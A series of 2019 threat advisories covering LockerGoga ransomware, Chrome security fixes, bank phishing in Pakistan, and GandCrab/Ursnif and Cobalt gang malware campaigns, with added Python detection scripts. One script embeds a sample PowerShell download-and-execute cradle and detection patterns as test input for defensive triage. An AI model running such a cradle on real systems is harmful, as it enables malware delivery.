Posted by Web Editor in Rewterz News on January 31st, 2019
SEVERITY: Medium
CATEGORY: Cyber Crime
ANALYSIS SUMMARY
The new LockerGoga ransomware has been found, most notably in a cyber attack on the French engineering consultancy Altran Technologies.
The distribution method of this ransomware is not yet clear. Once executed, it targets DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX and PDF files. Samples of this ransomware have been uploaded from Romania and the Netherlands, while its victims have been observed in five different countries.
The ransomware can spread laterally through network connections and network shares, resulting in widespread file encryption. Some researchers have called it a sloppy, slow ransomware that does not attempt to evade detection. Security researchers reported that the ransomware spawns a new process for each file it encrypts, which makes the encryption process very slow. Once it has encrypted a file, it appends the extension .locked to it, and it leaves a ransom note on the desktop like this:
Bleeping Computer suggests that the first Yara rule from Security Researcher V be considered when trying to detect this infection family, in order to protect organizations from the LockerGoga ransomware.
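The two behaviours the advisory describes, one process spawned per encrypted file and the .locked extension appended to targeted file types, are both observable from endpoint telemetry. The following is an added detection example, written here and not taken from the advisory, Bleeping Computer or the Yara rule it mentions; the process-creation and file-rename events are constructed sample data, and the sample parent image path, thresholds and window are assumptions chosen for the illustration.

```python
import os
from collections import defaultdict
from datetime import datetime, timedelta

# File types the advisory lists as LockerGoga targets, plus the extension it appends.
TARGETED_EXTS = {
    ".doc", ".dot", ".wbk", ".docx", ".dotx", ".docb", ".xlm", ".xlsx", ".xltx",
    ".xlsb", ".xlw", ".ppt", ".pot", ".pps", ".pptx", ".potx", ".ppsx", ".sldx", ".pdf",
}
LOCKED_EXT = ".locked"

# Constructed process-creation events: (timestamp, parent image, child image, command line).
# Sample data for this example, not telemetry from the advisory.
PROCESS_EVENTS = [
    ("2019-01-29T10:00:00", r"C:\Temp\sample.exe", r"C:\Temp\sample.exe", r"sample.exe -i C:\docs\f1.docx"),
    ("2019-01-29T10:00:01", r"C:\Temp\sample.exe", r"C:\Temp\sample.exe", r"sample.exe -i C:\docs\f2.xlsx"),
    ("2019-01-29T10:00:02", r"C:\Temp\sample.exe", r"C:\Temp\sample.exe", r"sample.exe -i C:\docs\f3.pptx"),
    ("2019-01-29T10:00:03", r"C:\Temp\sample.exe", r"C:\Temp\sample.exe", r"sample.exe -i C:\docs\f4.pdf"),
    ("2019-01-29T10:00:04", r"C:\Temp\sample.exe", r"C:\Temp\sample.exe", r"sample.exe -i C:\docs\f5.doc"),
    ("2019-01-29T10:00:05", r"C:\Temp\sample.exe", r"C:\Temp\sample.exe", r"sample.exe -i C:\docs\f6.xlsb"),
    # Ordinary interactive activity: a parent that spawns a couple of children minutes apart.
    ("2019-01-29T10:00:00", r"C:\Windows\explorer.exe", r"C:\Program Files\Editor\editor.exe", r"editor.exe C:\docs\f1.docx"),
    ("2019-01-29T10:05:00", r"C:\Windows\explorer.exe", r"C:\Windows\notepad.exe", "notepad.exe"),
]

# Constructed file-rename events: the new path after each rename.
FILE_EVENTS = [
    r"C:\docs\f1.docx.locked",
    r"C:\docs\f2.xlsx.locked",
    r"C:\docs\readme.txt.locked",
    r"C:\docs\f3.pptx",
]


def burst_spawning_parents(events, threshold=5, window=timedelta(seconds=10)):
    """Return parent images that spawned at least `threshold` children within any
    `window`-long span: the 'new process per encrypted file' pattern the advisory describes."""
    times_by_parent = defaultdict(list)
    for ts, parent, _child, _cmd in events:
        times_by_parent[parent].append(datetime.fromisoformat(ts))
    flagged = []
    for parent, times in times_by_parent.items():
        times.sort()
        left = 0
        for right, t in enumerate(times):
            # Slide the left edge forward until the span fits inside the window.
            while t - times[left] > window:
                left += 1
            if right - left + 1 >= threshold:
                flagged.append(parent)
                break
    return sorted(flagged)


def locked_files(renames):
    """Return (original_path, targeted) for every rename that appended .locked;
    `targeted` tells whether the original extension is on the advisory's target list."""
    hits = []
    for path in renames:
        if not path.lower().endswith(LOCKED_EXT):
            continue
        original = path[: -len(LOCKED_EXT)]
        ext = os.path.splitext(original)[1].lower()
        hits.append((original, ext in TARGETED_EXTS))
    return hits


if __name__ == "__main__":
    print("parents with burst spawning:", burst_spawning_parents(PROCESS_EVENTS))
    for original, targeted in locked_files(FILE_EVENTS):
        print(f"{original} -> .locked (targeted type: {targeted})")
```

The sliding window keeps the check linear in the number of events per parent, so it can run over a day of Sysmon or EDR process events; the threshold and window should be tuned against a baseline of build tools and installers, which also spawn child processes in bursts, before alerting on it.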
INDICATORS OF COMPROMISE
Filename
Email Address
Malware Hash (MD5/SHA1/SHA256)
REMEDIATION
Block the threat indicators at their respective controls and keep your systems up to date. Since the attack vector is still unknown, running products with known vulnerabilities increases the risk of attack by a malicious entity.
Posted by Web Editor in Rewterz News on January 31st, 2019
SEVERITY: HIGH
CATEGORY: Vulnerability
ANALYSIS SUMMARY
Google has released security updates for Google Chrome addressing multiple vulnerabilities that an attacker could exploit to take control of an affected system. The new version for Windows, Mac and Linux contains 58 security fixes. The following vulnerabilities, ranging from Medium to High severity, have been addressed:
CVE-2019-5754: Inappropriate implementation in QUIC Networking
CVE-2019-5755: Inappropriate implementation in V8
CVE-2019-5756: Use after free in PDFium
CVE-2019-5757: Type Confusion in SVG
CVE-2019-5758: Use after free in Blink
CVE-2019-5759: Use after free in HTML select elements
CVE-2019-5760: Use after free in WebRTC
CVE-2019-5761: Use after free in SwiftShader
CVE-2019-5762: Use after free in PDFium
CVE-2019-5763: Insufficient validation of untrusted input in V8
CVE-2019-5764: Use after free in WebRTC
CVE-2019-5765: Insufficient policy enforcement in the browser
CVE-2019-5766: Insufficient policy enforcement in Canvas
CVE-2019-5767: Incorrect security UI in WebAPKs
CVE-2019-5768: Insufficient policy enforcement in DevTools
CVE-2019-5769: Insufficient validation of untrusted input in Blink
CVE-2019-5770: Heap buffer overflow in WebGL
CVE-2019-5771: Heap buffer overflow in SwiftShader
CVE-2019-5772: Use after free in PDFium
CVE-2019-5773: Insufficient data validation in IndexedDB
CVE-2019-5774: Insufficient validation of untrusted input in SafeBrowsing
CVE-2019-5775: Insufficient policy enforcement in Omnibox
CVE-2019-5776: Insufficient policy enforcement in Omnibox
CVE-2019-5777: Insufficient policy enforcement in Omnibox
CVE-2019-5778: Insufficient policy enforcement in Extensions
CVE-2019-5779: Insufficient policy enforcement in ServiceWorker
CVE-2019-5780: Insufficient policy enforcement
CVE-2019-5781: Insufficient policy enforcement in Omnibox
CVE-2019-5782: Inappropriate implementation in V8
Other issues addressed in the update include:
Use after free in FileAPI
Use after free in Mojo interface
Use after free in Payments.
Stack buffer overflow in Skia
Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions and possibly take control of the affected system.
IMPACT
Code Execution
Security Bypass
System Access
REMEDIATION
Update to the latest version, Chrome 72.0.3626.81 for Windows, Mac and Linux, which contains these fixes along with a number of other fixes and improvements.
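Checking that a fleet has actually reached the patched build is a matter of comparing version strings numerically rather than lexically ("9.0" sorts after "72.0" as text). The following is an added example written for this post, not a tool from Google or Rewterz; the host inventory is constructed sample data and the minimum version is the one the advisory names.

```python
# Minimum patched build named in the advisory.
MIN_PATCHED = "72.0.3626.81"

# Constructed inventory of hostname -> Chrome version as reported by an asset tool (sample data).
INVENTORY = {
    "ws-01": "72.0.3626.81",
    "ws-02": "71.0.3578.98",
    "ws-03": "72.0.3626.96",
    "ws-04": "9.0.1234.5",   # sorts after "72..." as a string but is far behind numerically
}


def parse_version(version):
    """Split a dotted Chrome version into a tuple of ints so comparison is numeric."""
    return tuple(int(part) for part in version.strip().split("."))


def is_patched(installed, minimum=MIN_PATCHED):
    """True if the installed build is at or above the minimum patched build."""
    return parse_version(installed) >= parse_version(minimum)


def outdated_hosts(inventory, minimum=MIN_PATCHED):
    """Return the hostnames whose Chrome build is below the minimum, sorted for reporting."""
    return sorted(host for host, version in inventory.items() if not is_patched(version, minimum))


def lexical_comparison_is_wrong(installed, minimum=MIN_PATCHED):
    """Show the pitfall: True when plain string comparison disagrees with the numeric result."""
    return (installed >= minimum) != is_patched(installed, minimum)


if __name__ == "__main__":
    print("hosts still below", MIN_PATCHED, "->", outdated_hosts(INVENTORY))
```

Version strings from asset tools occasionally carry a trailing channel or build tag; normalise those before calling parse_version, since int() will reject them.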
If you think you’re a victim of a cyber-attack, immediately send an email to soc@rewterz.com.
Posted by Web Editor in Rewterz News on January 30th, 2019
SEVERITY: High
CATEGORY: Phishing
ANALYSIS SUMMARY
Looking at the recent phishing campaigns observed attacking employees of the banking sector in Pakistan, it is highly possible that the same phishing attacks are also targeting bank customers. It is therefore suggested to urgently run awareness programs for both employees and customers.
Phishing emails are fake emails that falsely claim the identity of a legitimate organization in order to steal credentials or personal information. Phishing mainly uses popular communication tools such as email, instant messaging and peer-to-peer communication, either obtaining sensitive information directly or luring victims into visiting fake websites.
The fake websites usually look very similar to the legitimate websites of the respective banks and cannot be recognised as malicious by an unsuspecting user. Information entered on such sites, such as usernames and passwords, can be used to carry out fraudulent activities such as unauthorized transactions, or can be sold to fraudulent groups for further malicious activity.
IMPACT
Information Disclosure
Credential Theft
Account Compromise
Fraudulent Transactions
REMEDIATION
Posted by Web Editor in Rewterz News on January 29th, 2019
SEVERITY: Medium
CATEGORY: Phishing
ANALYSIS SUMMARY
A campaign has been observed distributing both the Ursnif malware and the GandCrab ransomware via malicious Word documents attached to phishing emails. The Word documents contain a VBS macro that executes a base64-encoded PowerShell script. The PowerShell script is used to retrieve the files associated with the GandCrab and Ursnif infections. The first payload that is downloaded and executed is a PowerShell command used to download an additional PowerShell script. This additional PowerShell script contains a base64-encoded PE file which it injects into memory for execution. This PE file was identified as a variant of the GandCrab ransomware. The second payload that is downloaded and executed via the VBS macro is the Ursnif executable, which is used for malicious activities such as gathering system information and harvesting credentials.
IMPACT
Leakage of system information
Loss of credentials
INDICATORS OF COMPROMISE
URLs
bevendbrec[.]com
iscondisth[.]com
Malware Hash (MD5/SHA1/SHA256)
c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f
d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525
0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080
REMEDIATION
Block all URLs and IoCs at your respective controls.
Ensure antivirus software and its associated files are up to date.
Always be suspicious of emails sent to users from unknown senders.
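Both stages described above, a base64-encoded PowerShell command launched by the macro and a second script carrying a base64-encoded PE file, leave traces in process command lines that a responder can decode. The following is an added triage example, written here and not code from the advisory; the command lines, the stage-1 script text, the example.invalid URL and the fake PE blob are all constructed sample data, and the marker list is an assumption about what is worth flagging.

```python
import base64
import binascii
import re

# PowerShell's -EncodedCommand variants; the payload is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Markers of download-and-execute behaviour, matched against the lower-cased text.
MARKERS = {
    "downloadstring": re.compile(r"downloadstring"),
    "downloadfile": re.compile(r"downloadfile"),
    "iex": re.compile(r"\biex\b|invoke-expression"),
    "frombase64string": re.compile(r"frombase64string"),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden"),
}

# A long base64 literal inside a script: a candidate for an embedded binary.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_encoded_command(cmdline):
    """Return the decoded script carried by -EncodedCommand, or None if absent or malformed."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except binascii.Error:
        return None
    return raw.decode("utf-16-le", errors="replace")


def suspicious_markers(text):
    """Names of the markers present in `text`, sorted for stable reporting."""
    low = text.lower()
    return sorted(name for name, rx in MARKERS.items() if rx.search(low))


def embedded_pe(text):
    """True if any long base64 literal decodes to data starting with the 'MZ' header."""
    for candidate in B64_LITERAL.findall(text):
        try:
            blob = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            continue
        if blob.startswith(b"MZ"):
            return True
    return False


def triage_cmdline(cmdline):
    """Decode the encoded command and report markers over the visible flags plus the decoded script."""
    decoded = decode_encoded_command(cmdline)
    # Drop the encoded blob itself so random base64 characters cannot trigger a marker.
    visible = ENC_FLAG.sub("", cmdline)
    text = visible + "\n" + (decoded or "")
    return {"decoded": decoded, "markers": suspicious_markers(text), "embedded_pe": embedded_pe(text)}


def _encode(script):
    """Encode a script the way PowerShell expects it (used only to build the samples below)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples. The stage-1 script is a generic download cradle pointing at a
# reserved .invalid hostname; the 'PE' is just an MZ header followed by zero bytes.
STAGE1_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + _encode(STAGE1_SCRIPT)
FAKE_PE = base64.b64encode(b"MZ" + bytes(62)).decode("ascii")
STAGE2_SCRIPT = "$bytes = [Convert]::FromBase64String('" + FAKE_PE + "')"
SAMPLE_STAGE2_CMDLINE = "powershell.exe -enc " + _encode(STAGE2_SCRIPT)
BENIGN_CMDLINE = "powershell.exe -Enc " + _encode("Get-Date")

if __name__ == "__main__":
    for cmd in (SAMPLE_CMDLINE, SAMPLE_STAGE2_CMDLINE, BENIGN_CMDLINE):
        print(triage_cmdline(cmd))
```

Run it over the CommandLine field of process-creation events (Sysmon event 1, Windows 4688 with command-line auditing enabled); the decoded script, not the opaque blob, is what belongs in the alert so an analyst can see the download URL and the second-stage behaviour at a glance.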
Posted by Web Editor in Rewterz News on January 29th, 2019
SEVERITY: Medium
CATEGORY: Phishing
ANALYSIS SUMMARY
Following the previous two phishing campaigns that spoofed Summit Bank and Bank Al-Habib, the streak continues with two further campaigns targeting bank employees in Pakistan. This time the attackers spoofed Faysal Bank's internet banking site and the Standard Chartered Bank. The email claiming to come from Faysal Bank looks like this:
Clicking on "Click Here Now" redirects users to a malicious URL that looks very similar to the legitimate Internet Banking site of Faysal Bank. An unsuspecting user is unlikely to tell the fake site apart from the original.
The second campaign of the day fakes the identity of Standard Chartered Bank and has targeted more than a hundred bank employees in Pakistan. The email pretending to come from Standard Chartered Bank looks like this:
The hyperlink in this email also redirects to a URL which again looks similar to the legitimate site.
However, this time the site asks for more information than just credentials. Once the information is provided, the user is redirected to the login page of the bank's original website, without being logged in.
IMPACT
Credential Theft
Exposure of Personal Information
INDICATORS OF COMPROMISE
URLs
https[:]//cbd9[.]net/images/query/faysalmobit/faysalmobit[.]php
http[:]//blayzercommerce[.]com/wp-content/themes/twentysixteen/schartered/schartered[.]html
Email Address
noreplymobit[@]faysalbank[.]com[.]pk
iBanking[.]Pakistan[@]sc[.]com
Email Subject
Faysal Bank Account Locked
Standard Chartered Bank – Account Locked
REMEDIATION
This brings the count of phishing campaigns targeting bank employees in Pakistan while spoofing the identity of banks to four. It is advised to strictly avoid opening irrelevant or unexpected emails, attachments and URLs, even if the source looks as legitimate as a financial organization.
Posted by Web Editor in Rewterz News on January 29th, 2019
SEVERITY: HIGH
CATEGORY: DATA BREACH
ANALYSIS SUMMARY
Known for targeting financial organizations, the Cobalt gang has resurfaced with another campaign that drops malware. About 42 targets from the financial and banking sector around the world have been attacked by the Cobalt gang's campaign, which is meant to drop malware via PDF decoys using the Google Cloud Platform (GCP) App Engine.
The attackers abuse GCP URL redirection in the PDF decoys, redirecting victims to the malicious URL hosting the payload.
Because the URL hosting the malware points to Google App Engine as its host, it appears more trustworthy to the targets. Most of the PDFs involved were created using Adobe Acrobat 18.0. The PDF decoy downloads a Word document containing obfuscated macro code. This document was downloaded from the URL https://transef[.]biz.
Once the download is complete, opening the document shows a message asking the user to enable editing and content in order to view it. When the user enables the option, the macro executes and downloads the next-stage payload.
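A decoy that relies on a trusted host redirecting to the real payload URL can be spotted in the PDF itself: the link annotation's /URI carries another http(s) URL inside its query string. The following is an added example for this post, not code from the advisory or from the researchers it summarises; the PDF bytes are a constructed minimal document, the `/redirect?continue=` path on appengine.google.com is an assumed illustration of a redirect parameter rather than the real path the campaign used, and transef.biz is the domain named above.

```python
import re
from urllib.parse import parse_qs, urlparse

# /URI entries of uncompressed link annotations, written as PDF literal strings
# without escaped parentheses (the common case for simple decoys).
URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")


def extract_uris(pdf_bytes):
    """All /URI link targets found in the raw PDF bytes."""
    return [m.decode("latin-1") for m in URI_RE.findall(pdf_bytes)]


def nested_target(url):
    """The first query-parameter value that is itself an http(s) URL, else None.
    parse_qs splits on '&', so only the nested URL's scheme and host are relied on here."""
    for values in parse_qs(urlparse(url).query).values():
        for value in values:
            if value.lower().startswith(("http://", "https://")):
                return value
    return None


def redirect_links(pdf_bytes):
    """Links whose outer host merely redirects to a second host embedded in the query string."""
    findings = []
    for link in extract_uris(pdf_bytes):
        target = nested_target(link)
        if target:
            findings.append({
                "link": link,
                "outer_host": (urlparse(link).hostname or "").lower(),
                "redirects_to": (urlparse(target).hostname or "").lower(),
            })
    return findings


# Constructed minimal PDF with two link annotations (sample data, not a real decoy).
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Annot /Subtype /Link /Rect [72 700 300 720]
   /A << /S /URI /URI (https://appengine.google.com/redirect?continue=https://transef.biz/) >> >>
endobj
2 0 obj
<< /Type /Annot /Subtype /Link /Rect [72 650 300 670]
   /A << /S /URI /URI (https://www.example.com/help) >> >>
endobj
%%EOF
"""

if __name__ == "__main__":
    for finding in redirect_links(SAMPLE_PDF):
        print(f"{finding['outer_host']} redirects to {finding['redirects_to']}: {finding['link']}")
```

Real decoys usually keep their annotations inside FlateDecode-compressed object streams, so run the extraction over the decompressed objects (a PDF library such as pdfminer or pypdf can provide them) rather than over the raw file; the nested-URL test itself does not change. The outer host being a well-known cloud platform is exactly why the link should be judged by where it finally lands.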
IMPACT
Code Execution
Malware Infection
INDICATORS OF COMPROMISE
URLs
FILENAME
EXTENSION
.eml
EMAIL ADDRESS
REMEDIATION